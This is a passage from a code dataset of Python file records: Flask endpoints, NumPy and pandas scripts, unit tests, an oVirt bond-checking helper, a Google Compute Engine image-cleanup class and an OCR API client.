{'ContentType':'application/json'}\n\n@app.route('/api/admin/removeterm', methods=['POST'])\ndef remove_term():\n \"\"\"Deletes a term code from the database\n\n Note\n ----\n The POST request should contain the following information:\n\n {\n 'params': {\n 'id': Unique database ID of the term code,\n }\n }\n\n Aborts with a 403 error code if the user is not an admin. This is used to\n protect against direct calls to the API from software such as Postman.\n\n Returns\n -------\n JSON object\n JSON object indicating successful deletion with a 200 status code\n\n \"\"\" \n if not is_admin():\n abort(403)\n\n if request.method == 'POST':\n db.call_delete_term_code(int(request.get_json()['params']['id']))\n print(request.get_json())\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'}\n","sub_path":"back-end/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":19269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465650203","text":"# Write a NumPy program to compute the histogram of nums against the bins. Label your x-axis with nums and y-axis\n# with bins. Add a title to the histogram: Histogram of nums against bins.\n\nimport numpy as numpy\nimport matplotlib.pyplot as plt\n\n# CREATE THE NUMPY ARRAYS\nnums = numpy.array([0.5, 0.7, 1.0, 1.2, 1.3, 2.1])\nbins = numpy.array([0, 1, 2, 3])\n\n# PRINT THE DETAILS\nprint(\"nums: \", nums)\nprint(\"bins: \", bins)\nprint(\"Result:\", numpy.histogram(nums, bins))\n\n# ADD THE TITLE\nplt.title(\"Histogram of nums against bins.\")\n# ADD THE X-AXIS LABEL\nplt.xlabel(\"nums\")\n# ADD THE Y-AXIS LABEL\nplt.ylabel(\"bins\")\n# PLOT THE GRAPH WITH THE VALUES\nplt.hist(nums, bins=bins)\n# SHOW THE GRAPH\nplt.show()","sub_path":"challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"567046745","text":"from proj5_code.image_loader import ImageLoader\nfrom proj5_code.data_transforms import get_fundamental_transforms\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\n\nPROJ_ROOT = Path(__file__).resolve().parent.parent\n\n\ndef test_dataset_length():\n train_image_loader = ImageLoader(\n root_dir=f\"{PROJ_ROOT}/data/\",\n split=\"train\",\n transform=get_fundamental_transforms(inp_size=(64, 64)),\n )\n\n test_image_loader = ImageLoader(\n root_dir=f\"{PROJ_ROOT}/data/\",\n split=\"test\",\n transform=get_fundamental_transforms(inp_size=(64, 64)),\n )\n\n assert train_image_loader.__len__() == 2985\n assert test_image_loader.__len__() == 1500\n\n\ndef test_unique_vals():\n train_image_loader = ImageLoader(\n root_dir=f\"{PROJ_ROOT}/data/\",\n split=\"train\",\n transform=get_fundamental_transforms(inp_size=(64, 64)),\n )\n\n item1 = train_image_loader.__getitem__(10)\n item2 = train_image_loader.__getitem__(25)\n\n assert not torch.allclose(item1[0], item2[0])\n\n\ndef test_class_values():\n \"\"\" \"\"\"\n test_image_loader = ImageLoader(\n root_dir=f\"{PROJ_ROOT}/data/\",\n split=\"test\",\n transform=get_fundamental_transforms(inp_size=(64, 64)),\n )\n\n class_labels = test_image_loader.class_dict\n class_labels = {ele.lower(): class_labels[ele] for ele in class_labels}\n \n # should be 15 unique keys and 15 unique values in the dictionary\n assert len(set(class_labels.values())) == 15\n assert len(set(class_labels.keys())) == 15\n \n # indices must be ordered from [0,14] only\n assert set(list(range(15))) == set(class_labels.values())\n \n # must be ordered alphabetically\n assert class_labels['industrial'] == 4\n assert class_labels['suburb'] == 13\n\n\ndef test_load_img_from_path():\n test_image_loader = ImageLoader(\n root_dir=f\"{PROJ_ROOT}/data/\",\n split=\"train\",\n transform=get_fundamental_transforms(inp_size=(64, 64)),\n )\n im_path = f\"{PROJ_ROOT}/data/train/bedroom/image_0003.jpg\"\n\n im_np = np.asarray(test_image_loader.load_img_from_path(im_path))\n\n expected_data = np.loadtxt(f\"{PROJ_ROOT}/proj5_unit_tests/data/sample_inp.txt\")\n\n assert np.allclose(expected_data, im_np)\n\n\nif __name__ == \"__main__\":\n test_load_img_from_path()\n","sub_path":"proj5/proj5_unit_tests/test_image_loader.py","file_name":"test_image_loader.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"457072242","text":"from flask import Flask\n\napp = Flask(__name__)\ncount=0\n\n@app.route('/dave')\ndef hello_world(): \n global count \n count=+1\n return 'Hello, World ... Hello Dave {}'.format(count)\n\nif __name__ == '__main__':\n app.run()","sub_path":"FlaskApps/flaskapp1.py","file_name":"flaskapp1.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293243936","text":"import logging\nimport shlex\n\nfrom art.rhevm_api.tests_lib.low_level import (\n networks as ll_networks,\n hosts as ll_hosts\n)\nimport rhevmtests.helpers as global_helper\n\nlogger = logging.getLogger(\"Bad_Bond_Helper\")\n\n\ndef check_mac_address(mac_address, positive):\n \"\"\"\n Check if given MAC address is zero or not\n\n Args:\n mac_address (str): MAC address\n positive (bool): True to check for valid bond address (non-zero), False\n to check for invalid bond address (zero)\n\n Returns:\n bool: True if MAC address is not zero or zero, according to the no_zero\n argument, False otherwise\n\n \"\"\"\n zero_mac = \"00:00:00:00:00:00\"\n return mac_address != zero_mac if positive else mac_address == zero_mac\n\n\ndef get_bond_ad_partner_mac_in_linux(host_name, bond_name):\n \"\"\"\n Get LACP bond (mode-4) ad_partner_mac MAC value in Linux\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n bool: True if get was successful, False otherwise\n\n \"\"\"\n logger.info(\n \"Checking if ad_partner_mac value is reported in Linux on bond: %s\",\n bond_name\n )\n cmd = \"cat /sys/class/net/%s/bonding/ad_partner_mac\" % bond_name\n host_rsc = global_helper.get_host_resource_by_name(host_name=host_name)\n rc, os_out, _ = host_rsc.run_command(shlex.split(cmd))\n if rc or not os_out:\n logger.error(\n \"Linux not reported ad_partner_mac value on bond: %s\", bond_name\n )\n return False\n\n logger.info(\"Linux reported ad_partner_mac value: %s\", os_out.strip())\n return True\n\n\ndef check_bond_ad_partner_mac_in_vds_client(host_name, bond_name):\n \"\"\"\n Check if LACP bond (mode-4) ad_partner_mac value is reported by VDS client\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n str: MAC address, or empty string if not reported, or error has\n occurred\n\n \"\"\"\n logger.info(\n \"Checking if ad_partner_mac value is reported in vdsClient on bond:\"\n \" %s\", bond_name\n )\n host_rsc = global_helper.get_host_resource_by_name(host_name=host_name)\n cmd_out = host_rsc.vds_client(cmd=\"Host.getCapabilities\")\n if not cmd_out:\n logger.error(\n \"vdsClient getVdsCapabilities returned empty response on host: %s\",\n host_name\n )\n return \"\"\n\n cmd_out = cmd_out.get(\"bondings\", dict()).get(bond_name, dict()).get(\n \"ad_partner_mac\"\n )\n\n if not cmd_out:\n logger.error(\n \"vdsClient not reported ad_partner_mac value on bond: %s\",\n bond_name\n )\n return \"\"\n\n logger.info(\"vdsClient reported ad_partner_mac value: %s\", cmd_out)\n return cmd_out\n\n\ndef check_bond_ad_partner_mac_in_rest(host_name, bond_name):\n \"\"\"\n Check if LACP bond (mode-4) ad_partner_mac value is reported by REST\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n str: MAC address, or empty string if not reported, or error has\n occurred\n \"\"\"\n host_obj = ll_hosts.get_host_object(host_name=host_name)\n mac = ll_networks.get_bond_bonding_property(\n host=host_obj, bond=bond_name, property_name=\"ad_partner_mac\"\n )\n if not mac:\n logger.error(\n \"REST not reported ad_partner_mac value on bond: %s\",\n bond_name\n )\n return \"\"\n\n logger.info(\"REST reported ad_partner_mac value: %s\", mac.address)\n return mac.address\n","sub_path":"art/tests/rhevmtests/networking/bad_bond/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"266537565","text":"\"\"\"Add slate information dynamically。\"\"\"\n\nfrom datetime import datetime\nimport os\n\nfrom photoshop import Session\n\nfile_path = os.path.join(os.path.dirname(__file__), \"slate_template.psd\")\n\nwith Session(file_path, action=\"open\", auto_close=True) as ps:\n layer_set = ps.active_document.layerSets.getByName(\"template\")\n data = {\n \"project name\": \"test_project\",\n \"datetime\": datetime.today().strftime('%Y-%m-%d')\n }\n for layer in layer_set.layers:\n if layer.kind == \"TextLayer\":\n layer.textItem.contents = data[layer.textItem.contents.strip()]\n\n jpg_file = \"d:/photoshop_slate.jpg\"\n ps.active_document.saveAs(jpg_file, ps.JPEGSaveOptions())\n os.startfile(jpg_file)\n","sub_path":"examples/photoshop_session.py","file_name":"photoshop_session.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"80931114","text":"import pandas as pd\n\ndef cal_increase(data, outfile):\n\n \"\"\"Calculate the increase value and return the calculated table for all stocks\n \n formula:\n increase = (the last value - the first value) / the first value * 100\n\n conditions:\n - data columns: ['Name', 'Date', 'notes', 'Value', 'Change']\n - data must be cleaned (without any missing values such as Null, UNKNOWN, NA)\n - data['Date'] must be converted to be the type 'datetime' by `pd.to_datetime()`\n \"\"\"\n\n # the records of the first date\n first_dates = data.sort_values(by=['Date']).drop_duplicates(subset='Name', keep='first')\n # the records of the last date\n last_dates = data.sort_values(by=['Date']).drop_duplicates(subset='Name', keep='last')\n # merge the records by 'Stock Name' with first_date_records and last_date_records\n final_data = pd.merge(first_dates, last_dates, on='Name')\n\n # calculate the increased values\n # increase = (the value of the last date - the value of the first date) / the value of the first date * 100\n final_data['increased'] = (final_data['Value_y'].astype(float) - final_data['Value_x'].astype(float)) / final_data['Value_x'].astype(float) * 100\n\n # rename the columns\n final_data.rename(columns={'Date_x': 'Date_first', \\\n 'notes_x': 'notes_first', \\\n 'Value_x': 'Value_first', \\\n 'Change_x': 'Change_first', \\\n 'Date_y': 'Date_last', \\\n 'notes_y': 'notes_last', \\\n 'Value_y': 'Value_last', \\\n 'Change_y': 'Change_last'}, inplace=True)\n\n # output the results\n final_data.sort_values(by=['increased'], ascending=False).to_csv(out_file)\n","sub_path":"python/stock_insights/insights/increase.py","file_name":"increase.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154811509","text":"def main():\n cakes.sort()\n cakes.sort(key=lambda x: str(x)[-1])\n\n answer = 0\n chance = m\n\n for cake in cakes:\n if cake == 10:\n answer += 1\n elif cake > 10 and chance > 0:\n div, mod = divmod(cake, 10)\n\n if mod == 0:\n cnt = min(div - 1, chance)\n\n if chance >= div - 1:\n answer += 1\n else:\n cnt = min(div, chance)\n\n chance -= cnt\n answer += cnt\n\n print(answer)\n\n\nif __name__ == \"__main__\":\n n, m = map(int, input().split())\n cakes = list(map(int, input().split()))\n\n main()\n","sub_path":"0816~0817/16206 롤케이크.py","file_name":"16206 롤케이크.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"366365047","text":"# 判断是否符合球队\ndef fun(sex,age):\n if(sex == 'f') and (age in ['10','11','12']):\n print('可以加入球队')\n return 1\n else:\n print(\"不可以加入球队\")\n return 0\n#计数,满足要求的人数\nnum = 0\nfor i in range(10):\n sex = input('请输入性别:')\n age = input('请输入年龄:')\n # 调用函数实现判断\n num += fun(sex,age)\n\nprint('满足条件的总人数',num)","sub_path":"Test/WeekOne/Demo3.py","file_name":"Demo3.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255622744","text":"# 124. Binary Tree Maximum Path Sum\n# https://leetcode.com/problems/binary-tree-maximum-path-sum/\n\n# -----------------------------------------------------------\nimport sys\n\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n # def __init__(self) -> None:\n # self.ans = -sys.maxsize\n\n def oneSideMaxWithRoot(self, root: TreeNode) -> int:\n \"\"\"\n max path sum that must includes root node\n :param root:\n :return:\n \"\"\"\n if root is None:\n return -sys.maxsize\n left = max(0, self.oneSideMaxWithRoot(root.left))\n right = max(0, self.oneSideMaxWithRoot(root.right))\n # calculate and update the ans, when calculating oneSideMaxWithRoot.\n self.ans = max(self.ans, left + right + root.val)\n return root.val + max(left, right)\n\n def maxPathSum(self, root: TreeNode) -> int:\n \"\"\"\n max path sum that may or may not include root node\n :param root:\n :return:\n \"\"\"\n if root is None:\n return 0\n self.ans = -sys.maxsize\n self.oneSideMaxWithRoot(root)\n return self.ans\n# -----------------------------------------------------------\n# https://www.youtube.com/watch?v=9ZNky1wqNUw&ab_channel=HuaHua\n# https://www.acwing.com/file_system/file/content/whole/index/content/1753710/\n","sub_path":"0124-Binary-Tree-Maximum-Path-Sum/124.py","file_name":"124.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7066837","text":"#Herald\nimport telebot\nimport config\nimport db\nfrom otrh import function as otrh_f\nfrom otrh import names\nfrom otrh import game_config as gcfg\nfrom otrh import equip\nimport traceback\nfrom telebot import apihelper\nfrom telebot import types\n\nAPI_TOKEN = config.herald_token\nbot = telebot.TeleBot(API_TOKEN, threaded = True)\n\n\n@bot.channel_post_handler(func=lambda message: True)\ndef post_handler(post):\n\t_main_chat = '-1001270742403'\n\tbot.forward_message(_main_chat, post.chat.id, post.message_id)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n\n _data = call.data.split('_')\n if bot.get_chat_member(_data[1], call.from_user.id).status not in ['creator', 'administrator']:\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Не админ, не жми!\")\n if _data[0] == 'yes':\n bot.restrict_chat_member(_data[1], _data[2], _data[3], False)\n bot.delete_message(_data[1], call.message.message_id)\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Я верю что бан был обоснован.\")\n else:\n bot.delete_message(_data[1], call.message.message_id)\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Миссклик? Ну и ладно, без бана тоже хорошо\")\n\n if call.data.startswith('buy_'):\n if str(call.from_user.id) == _data[1]:\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Ты не можешь купить сам у себя!\")\n elif call.chat_instance != '-1848070246900715408':\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Торговля в данном чате запрещена!\")\n bot.edit_message_text(inline_message_id=call.inline_message_id, text=\"Торговля в данном чате запрещена!\")\n else:\n if db.get_user_inventory(_data[1])[_data[2]] < 1:\n bot.edit_message_text(inline_message_id=call.inline_message_id, text=\"У игрока закончился данный предмет.\")\n elif db.get_hero(call.from_user.id)['gold'] >= int(_data[3]):\n db.add_inventory(call.from_user.id, _data[2], 1)\n db.add_inventory(_data[1], _data[2], -1)\n db.add_gold(call.from_user.id, -int(_data[3]))\n db.add_gold(_data[1], int(_data[3]))\n bot.answer_callback_query(callback_query_id=call.id, show_alert=False, text=\"Ты приобрел данный предмет!\")\n\n\n\n_ref_text = 'Привет путник 🧙‍♂️, кажется ты что-то слышал в кустах🌳, скорее жми /catch и отправься в невероятное приключение по миру RogTor✨ в котором ты найдёшь много приятных собеседников👨‍💻, опробуешь уникальную механику игры🎮и наконец-то поймёшь, что значит быть задротом🕑\\nПодними свой меч во имя короля! 👑\\n\\nТебя тут ждут,жми! \\nНачать игру!'\n\n@bot.inline_handler(func=lambda query: True)\ndef query_text(query):\n results = []\n i = 2\n test = types.InlineQueryResultArticle(id='1', title=\"Пригласить друга в игру.\",description=\"Кидает рекламный текст, с вашей реф.ссылкой\",input_message_content=types.InputTextMessageContent(message_text=_ref_text.format(query.from_user.id, query.from_user.id), parse_mode='Html', disable_web_page_preview=True))\n results.append(test)\n\n black_list_item = ['user_id', 'logic', 'lost_cargo', 'blacksmithtools']\n\n if len(query.query.split(' ')) == 2 and query.query.split(' ')[0] in names.item and query.query.split(' ')[0] not in black_list_item and int(db.get_user_inventory(query.from_user.id)[query.query.split(' ')[0]]) > 0:\n try:\n _store = db.get_user_inventory(query.from_user.id)\n if int(query.query.split(' ')[1]) == round(int(query.query.split(' ')[1])) and int(query.query.split(' ')[1]) > 0 and int(query.query.split(' ')[1]) < 1001 and not (query.query.split(' ')[1].startswith('0') or query.query.split(' ')[1].startswith('+')):\n _buy_text = 'Купить у {nick}'.format(**db.get_hero(query.from_user.id))\n _buy_text += '\\n{} за {}💰'.format(names.item[query.query.split(' ')[0]], query.query.split(' ')[1])\n kb = types.InlineKeyboardMarkup()\n _callback = 'buy_{}_{}_{}'.format(query.from_user.id, query.query.split(' ')[0], query.query.split(' ')[1])\n kb.add(types.InlineKeyboardButton(text=\"💰Купить\", callback_data=_callback))\n single_msg = types.InlineQueryResultArticle(\n id=\"2\", title=\"💰Продать {} за {}\".format(names.item[query.query.split(' ')[0]], query.query.split(' ')[1]),\n input_message_content=types.InputTextMessageContent(message_text=_buy_text),\n reply_markup=kb)\n results.append(single_msg)\n except Exception as e:\n print(e)\n pass\n bot.answer_inline_query(query.id, results, cache_time=1)\n\n\n_admin = '439637823'\ndef listener3(messages):\n for m in messages:\n try:\n\n if str(m.chat.id) == '-1001434073497':\n if m.content_type != 'text' or 'Купить у' not in m.text:\n bot.delete_message(m.chat.id, m.message_id)\n bot.restrict_chat_member(m.chat.id, m.from_user.id, int(m.date) + (30 * 60), False)\n return\n\n if m.content_type != 'text':\n return\n\n if m.text.lower().startswith('/ro') and 'reply_to_message' in m.json and bot.get_chat_member(m.chat.id, m.from_user.id).status in ['creator', 'administrator']:\n _data = m.text.split(' ')\n _data = [x for x in _data if x]\n try:\n _data[1] = int(_data[1])\n text = 'Дать юзеру RO на {} минут?'.format(_data[1])\n _data[1] = int(_data[1]) * 60\n _timess = int(m.date) + _data[1]\n except:\n _timess = 666\n text = 'Дать юзеру RO навсегда?'\n markup = telebot.types.InlineKeyboardMarkup()\n markup.row_width = 1\n _callback = '_{}_{}_{}'.format(m.chat.id, m.json['reply_to_message']['from']['id'], _timess)\n markup.add(telebot.types.InlineKeyboardButton(\"Забанить\", callback_data=\"yes\" + _callback), telebot.types.InlineKeyboardButton(\"Отменить\", callback_data=\"no\" + _callback))\n bot.send_message(m.chat.id, text=text, reply_to_message_id=m.reply_to_message.message_id, reply_markup=markup, parse_mode='Html')\n bot.delete_message(m.chat.id, m.message_id)\n return\n else:\n pass\n\n if m.text == '!id' and str(m.from_user.id) == '439637823':\n bot.delete_message(m.chat.id, m.message_id)\n bot.send_message(439637823, str(m.chat.id))\n return\n\n except Exception:\n bot.send_message(439637823, str(traceback.format_exc()))\n #print(m)\n\nbot.set_update_listener(listener3)\n\n\nbot.polling()","sub_path":"RPG/herald.py","file_name":"herald.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"576772032","text":"\"\"\"\nContains BSD Radius server version info\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/webstuff/tags/release20061229_v_1_0_0/webstuff/webstuff_version.py $\n# Author:\t\t$Author: valts $\n# File version:\t$Revision: 9 $\n# Last changes:\t$Date: 2006-03-31 19:26:39 +0300 (Pk, 31 Mar 2006) $\n\n\nmajor = 0\nminor = 1\ndebug = 0\n\nfullVersion = '%s.%s.%s' % (major, minor, debug)\n","sub_path":"bsdradius/webstuff/webstuff_version.py","file_name":"webstuff_version.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"647148826","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin\nfrom sklearn.utils import shuffle\nfrom PIL import Image\n\nn_colors = 32\n\n# Load the raccoon image\nwaschbar = Image.open(\"waschbar.jpg\")\n\n# Convert to floats and then divide by 255 so that imshow will work on it\n# (The values have to be in range [0,1])\nwaschbar = np.array(waschbar, dtype=np.float64) / 255\n\n# Transform image to a 2D array\nw, h, d = original_shape = tuple(waschbar.shape)\nassert d == 3\nimage_array = np.reshape(waschbar, (w * h, d))\n\n# Fitting the model on a small subsample of the data\nimage_array_sample = shuffle(image_array, random_state=0)[:1000]\nkmeans = KMeans(n_clusters=n_colors, random_state=0).fit(image_array_sample)\n\n# Predicting color indices on the full image using k-means\nlabels = kmeans.predict(image_array)\n\n# Predicting color indices on the full image randomly \nrandom = shuffle(image_array, random_state=0)[:n_colors + 1]\nlabels_random = pairwise_distances_argmin(random, image_array, axis=0)\n\n\n# Recreate image of a certain size using the codebood and the labels\ndef recreate_image(codebook, labels, w, h):\n d = codebook.shape[1]\n image = np.zeros((w, h, d))\n label_idx = 0\n for i in range(w):\n for j in range(h):\n image[i][j] = codebook[labels[label_idx]]\n label_idx += 1\n return image\n\n# Display all results, alongside original image\nplt.figure(1)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Original image (96,615 colors)')\nplt.imshow(waschbar)\n\nplt.figure(2)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Quantized image (32 colors, K-Means)')\nplt.imshow(recreate_image(kmeans.cluster_centers_, labels, w, h))\n\nplt.figure(3)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Quantized image (32 colors, Random)')\nplt.imshow(recreate_image(random, labels_random, w, h))\nplt.show()\n","sub_path":"myexample.py","file_name":"myexample.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416752056","text":"import sqlite3\n\nconn = sqlite3.connect('demo.db')\ncursor= conn.cursor()\n#查詢資料列 META-INFO\ncursor.execute('PRAGMA TABLE_INFO(\"Lotto\")')\n#print(cursor.fetchall())\nnames =[t[1] for t in cursor.fetchall()]\n#print(names)\nfor name in names:\n print(name,end='\\t')\nprint('\\n---------------------------------')\n#查詢資料列 sql\nsql ='SELECT id,n1,n1,n3,n4,n5,ts FROM lotto'\ncursor.execute(sql)\nrows=cursor.fetchall()\n#print(rows)\n\nfor r in rows:\n print('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t'\n .format(r[0],r[1],r[2],r[3],r[4],r[5],r[6]))\n\ncursor.close()\n","sub_path":"case03/Select_1.py","file_name":"Select_1.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"603078208","text":"from .vault import GCECredential\nfrom .provider import Provider, Image\nimport googleapiclient.discovery\nfrom google.oauth2 import service_account\nfrom dateutil.parser import parse\nimport re\n\n\n\nclass GCE(Provider):\n __instances = dict()\n\n def __new__(cls, vault_namespace):\n if vault_namespace not in GCE.__instances:\n GCE.__instances[vault_namespace] = self = object.__new__(cls)\n self.__credentials = GCECredential(vault_namespace)\n self.__compute_client = None\n self.__project = None\n return GCE.__instances[vault_namespace]\n\n def compute_client(self):\n if self.__credentials.isExpired():\n self.__credentials.renew()\n self.__compute_client = None\n self.__project = self.__credentials.getPrivateKeyData()['project_id']\n if(self.__compute_client is None):\n credentials = service_account.Credentials.from_service_account_info(self.__credentials.getPrivateKeyData())\n self.__compute_client = googleapiclient.discovery.build('compute', 'v1', credentials=credentials,\n cache_discovery=False)\n return self.__compute_client\n\n def list_instances(self, zone):\n ''' List all instances by zone.'''\n result = []\n request = self.compute_client().instances().list(project=self.__project, zone=zone)\n while request is not None:\n response = request.execute()\n if 'items' in response:\n result += response['items']\n request = self.compute_client().instances().list_next(previous_request=request, previous_response=response)\n return result\n\n def list_all_instances(self):\n result = []\n for region in self.list_regions():\n for zone in self.list_zones(region):\n result += self.list_instances(zone=zone)\n return result\n\n def list_regions(self):\n '''Walk through all regions->zones and collect all instances to return them as list.\n @see https://cloud.google.com/compute/docs/reference/rest/v1/instances/list#examples'''\n result = []\n request = self.compute_client().regions().list(project=self.__project)\n while request is not None:\n response = request.execute()\n\n for region in response['items']:\n result.append(region['name'])\n request = self.compute_client().regions().list_next(previous_request=request, previous_response=response)\n return result\n\n def list_zones(self, region):\n region = self.compute_client().regions().get(project=self.__project, region=region).execute()\n return [GCE.url_to_name(z) for z in region['zones']]\n\n def delete_instance(self, instance_id, zone):\n if self.dry_run:\n self.log_info(\"Deletion of instance {} skipped due to dry run mode\", instance_id)\n else:\n self.compute_client().instances().delete(project=self.__project, zone=zone, instance=instance_id).execute()\n\n @staticmethod\n def url_to_name(url):\n return url[url.rindex('/')+1:]\n\n def parse_image_name(self, img_name):\n regexes = [\n # sles12-sp5-gce-x8664-0-9-1-byos-build1-56\n re.compile(r'''^sles\n (?P\\d+(-sp\\d+)?)\n -\n (?Pgce)\n -\n (?P[^-]+)\n -\n (?P\\d+-\\d+-\\d+)\n -\n (?P(byos|on-demand))\n -build\n (?P\\d+-\\d+)\n ''', re.RegexFlag.X),\n # sles15-sp2-byos-x8664-0-9-3-gce-build1-10\n # sles15-sp2-x8664-0-9-3-gce-build1-10\n re.compile(r'''^sles\n (?P\\d+(-sp\\d+)?)\n (-(?P[-\\w]+))?\n -\n (?P[^-]+)\n -\n (?P\\d+-\\d+-\\d+)\n -\n (?Pgce)\n -\n build\n (?P\\d+-\\d+)\n ''', re.RegexFlag.X)\n ]\n return self.parse_image_name_helper(img_name, regexes)\n\n def cleanup_all(self):\n images = list()\n request = self.compute_client().images().list(project=self.__project)\n while request is not None:\n response = request.execute()\n if 'items' not in response:\n break\n for image in response['items']:\n # creation:2019-11-04T14:23:06.372-08:00\n # name:sles12-sp5-gce-x8664-0-9-1-byos-build1-56\n m = self.parse_image_name(image['name'])\n if m:\n images.append(Image(image['name'], flavor=m['key'], build=m['build'],\n date=parse(image['creationTimestamp'])))\n self.log_dbg('Image {} is candidate for deletion with build {}', image['name'], m['build'])\n else:\n self.log_err(\"Unable to parse image name '{}'\", image['name'])\n\n request = self.compute_client().images().list_next(previous_request=request, previous_response=response)\n\n keep_images = self.get_keeping_image_names(images)\n\n for img in [i for i in images if i.name not in keep_images]:\n self.log_info(\"Delete image '{}'\", img.name)\n if self.dry_run:\n self.log_info(\"Deletion of image {} skipped due to dry run mode\", img.name)\n else:\n request = self.compute_client().images().delete(project=self.__project, image=img.name)\n response = request.execute()\n if 'error' in response:\n for e in response['error']['errors']:\n self.log_err(e['message'])\n if 'warnings' in response:\n for w in response['warnings']:\n self.log_warn(w['message'])\n","sub_path":"ocw/lib/gce.py","file_name":"gce.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39398958","text":"import json\nimport requests\nfrom api.utils import get_response\nfrom api.logger import uai_logger\n\n\nclass UAIOcrBaseDatastreamApi(object):\n\n def __init__(self, cmd_url, signature, public_key, resource_id, timestamp):\n self.cmd_params = {}\n self.cmd_header = {}\n self.cmd_url = cmd_url\n self.cmd_header['Signature'] = signature\n self.cmd_header['PublicKey'] = public_key\n self.cmd_header['ResourceId'] = resource_id\n self.cmd_header['Timestamp'] = str(timestamp)\n\n def _check_args(self, header, params):\n if header['Signature'] == \"\":\n raise ValueError(\"Signature cannot be nil in header info\")\n if header['PublicKey'] == \"\":\n raise ValueError(\"PublicKey cannot be nil in header info\")\n if header['ResourceId'] == \"\":\n raise ValueError(\"ResourceId cannot be nil in header info\")\n if header['Timestamp'] == 0:\n raise ValueError(\"Timestamp cannot be nil in header info\")\n return True\n\n def call_api(self):\n if not self._check_args(self.cmd_header, self.cmd_params):\n raise ValueError(\"Check API params error, header: {0}, params: {1}\".\n format(self.cmd_header, self.cmd_params))\n\n def _send_post_request(self):\n r = requests.post(self.cmd_url, data=json.dumps(self.cmd_params), headers=self.cmd_header)\n rsp = json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n def _send_post_request_with_multi_part(self):\n # m = MultipartEncoder(fields=self.cmd_params)\n # self.cmd_header['Content-Type'] = m.content_type\n r = requests.post(self.cmd_url, files=self.cmd_params, headers=self.cmd_header)\n print (r.text)\n rsp = json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n def _send_get_request(self):\n r = requests.get(self.cmd_url, data=json.dumps(self.cmd_params), headers=self.cmd_header)\n rsp = 